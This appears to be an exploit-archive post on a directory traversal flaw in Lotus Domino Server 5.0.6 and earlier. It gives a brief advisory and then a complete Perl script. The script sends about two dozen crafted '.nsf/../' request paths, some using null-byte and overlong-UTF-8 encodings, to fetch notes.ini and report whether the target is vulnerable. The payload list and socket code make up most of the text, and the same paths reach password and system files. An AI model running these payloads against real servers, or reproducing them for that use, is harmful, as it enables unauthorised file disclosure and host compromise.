Lotus Domino Server 5.0.x Directory Traversal Vulnerability

[DarkLegion]

It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.

Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.

#!/usr/bin/perl

# PERL script to test a Domino server for directory

# traversal vulnerability. (BugTraq ID 2173,

# Lotus Domino Server Directory Traversal Vulnerability)

#

# Michael Smith, www.netlocksmith.com

# 01/15/2001

#

# Credit & thanks to all of these folks:

#

# - To Georgi Guninski, georgi,

# who discovered the original vulnerability,

# and Ralph Moonen of KPMG, who found additional

# URL variations

#

# - Roelof Temmingh, SensePost - SensePost Information Security,

# author of unicodecheck.pl, on which this

# script is based

#

# - Rain Forest Puppy, www.wiretrip.com,

# author of Sendraw routine

#

use Socket;

# --------------init

if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]";}

($host,$port)=split(/:/,@ARGV[0]);

if ($port=="") {$port=80;}

print "Testing $host:$port\n";

$target = inet_aton($host);

@notesvuln=( "/%00%00.nsf/../lotus/domino/notes.ini",

"/%00%20.nsf/../lotus/domino/notes.ini",

"/%00%c0%af.nsf/../lotus/domino/notes.ini",

"/%00...nsf/../lotus/domino/notes.ini",

"/%00.nsf//../lotus/domino/notes.ini",

"/%00.nsf/../lotus/domino/notes.ini",

"/%00.nsf/..//lotus/domino/notes.ini",

"/%00.nsf/../../lotus/domino/notes.ini",

"/%00.nsf.nsf/../lotus/domino/notes.ini",

"/%20%00.nsf/../lotus/domino/notes.ini",

"/%20.nsf//../lotus/domino/notes.ini",

"/%20.nsf/..//lotus/domino/notes.ini",

"/%c0%af%00.nsf/../lotus/domino/notes.ini",

"/%c0%af.nsf//../lotus/domino/notes.ini",

"/%c0%af.nsf/..//lotus/domino/notes.ini",

"/...nsf//../lotus/domino/notes.ini",

"/...nsf/..//lotus/domino/notes.ini",

"/.nsf///../lotus/domino/notes.ini",

"/.nsf//../lotus/domino/notes.ini",

"/.nsf//..//lotus/domino/notes.ini",

"/.nsf/../lotus/domino/notes.ini",

"/.nsf/../lotus/domino/notes.ini",

"/.nsf/..///lotus/domino/notes.ini",

"/.nsf%00.nsf/../lotus/domino/notes.ini",

"/.nsf.nsf//../lotus/domino/notes.ini",

"/.nsf.nsf/..//lotus/domino/notes.ini");

# ----- Test each possible version of vulnerability -----

foreach $notespath (@notesvuln) {

my @results=sendraw("GET ".$notespath." HTTP\/1.0\r\n\r\n");

foreach $line (@results){

if ($line =~ /\[Notes\]/) {$flag=1;}

}

}

if ($flag==0) {die("No vulnerability found at this address.\n");}

else {die("This site is vulnerable.\n");}

# ------------- Sendraw

sub sendraw {

my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||

die("Socket problems\n");

if(connect(S,pack "SnA4x8",2,$port,$target)){

my @in;

select(S); $|=1; print $pstr;

while(<S>){ push @in, $_;}

select(STDOUT); close(S); return @in;

} else { die("Can't connect...\n"); }

}

# ----------------------

SURSA